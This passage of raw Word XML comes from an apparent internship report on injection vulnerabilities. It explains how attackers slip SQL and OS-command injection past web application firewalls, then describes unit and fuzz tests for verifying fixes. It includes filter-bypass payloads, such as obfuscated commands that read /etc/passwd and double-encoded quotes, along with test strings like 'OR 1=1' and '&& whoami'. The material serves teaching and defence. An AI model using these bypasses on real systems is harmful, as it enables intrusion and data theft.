        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , attackers modify the text structure to confuse the filter while remaining readable to the backend interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9C64A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Case Variation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simply swapping cases ( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>sElEcT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>uNiOn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) easily tricks rigid, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>casesensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> regular expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38CBFE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inline Comments:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers insert empty database comments inside keywords to break up the text string. The WAF regex scans </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SEL//ECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ignores it, but the SQL database strips the comments and executes </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F69136" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>String Concatenation in Commands:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> For OS injection, if a WAF blocks strings containing </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , an attacker might pass </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>et'c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pas'swd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or use environment variables like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>et$u</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pas$u</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>$u</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is empty. The shell stitches the fragments back together perfectly at run-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D9875"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Alternative Encodings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3ECA85"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 xml:space="preserve">Filters usually look for plain text strings. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass this by transforming payloads into alternative encodings that the application backend automatically decodes later in the processing chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC40A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>URL and Double Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker encodes a hazardous single quote ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%27</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the WAF blocks </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%27</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , they double-encode it to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%2527</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . The WAF inspects the string, sees a benign percent sign and numbers, and passes it through. The backend application then decodes it twice, reconstructing the malicious single quote right before it hits the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75786B7A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hexadecimal and Base64 Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In SQL injection, instead of writing an explicit query string, attackers convert the payload into a hex string (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>0x73656c656374...</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). Databases like MySQL natively accept hex inputs within certain functions and decode them during execution, completely hiding the payload from network-level filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0255A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Alternative Whitespace:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many regex signatures search for a keyword followed immediately by a space character (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). Attackers replace spaces with tabs, newlines ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), mathematical operators, or parentheses (e.g.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1165B541"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Style w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT(username)FROM(users)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), completely bypassing whitespace-dependent filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E74400" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Verification &amp; Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14286F1F"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To round out the internship report, this section outlines how to formally verify a patch for injection vulnerabilities and how global compliance frameworks strictly mandate these technical defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BB7CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Fix Verification &amp; Testing Paradigms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04070E84"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When a development team marks an injection flaw as "resolved," code verification must go beyond basic manual smoke testing. Robust, automated regression suites should be implemented to prevent future code changes from reintroduced vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC485BE"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Negative Unit Testing (Malicious Assertions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174B8ECF"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Unit tests should intentionally feed known exploit strings directly into the controller or helper methods handling the data. The test must assert that the payload is safely handled as a literal string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B26B4C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Example Test Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pass </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the input parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB231D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Verification Expectation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The test passes if the system treats the input exactly as a literal string (e.g., searching for a username named precisely </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>test' OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and returning zero results), or if it triggers an expected, gracefully caught validation exception. It fails if a systemic syntax crash occurs or if it returns unfiltered records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F0DF1"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Automated Integration &amp; System-Level Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F969A82"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lastRenderedPageBreak/>
        <w:t>Tests should simulate actual end-to-end user traffic hitting the exposed API routing or application views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB263C2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Fuzz Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set up automated test pipelines to feed rows of boundary-breaking </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' " --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA1776" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">characters ( , , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%00</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
